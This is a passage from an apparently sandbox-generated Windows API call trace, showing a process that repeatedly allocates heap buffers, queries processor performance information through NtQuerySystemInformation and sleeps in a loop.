lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.564] Sleep (dwMilliseconds=0x110) [0198.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.580] Sleep (dwMilliseconds=0x110) [0198.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.595] Sleep (dwMilliseconds=0x110) [0198.620] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.620] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.620] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.621] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.621] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.621] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.624] Sleep (dwMilliseconds=0x110) [0198.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.676] Sleep (dwMilliseconds=0x110) [0198.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.689] Sleep (dwMilliseconds=0x110) [0198.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.705] Sleep (dwMilliseconds=0x110) [0198.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.720] Sleep (dwMilliseconds=0x110) [0198.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.741] Sleep (dwMilliseconds=0x110) [0198.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.768] Sleep (dwMilliseconds=0x110) [0198.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.784] Sleep (dwMilliseconds=0x110) [0198.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.798] Sleep (dwMilliseconds=0x110) [0198.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.815] Sleep (dwMilliseconds=0x110) [0198.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0198.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.832] Sleep (dwMilliseconds=0x110) [0198.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0198.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0198.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0198.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0198.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0198.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0198.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0198.843] HeapFree (in: 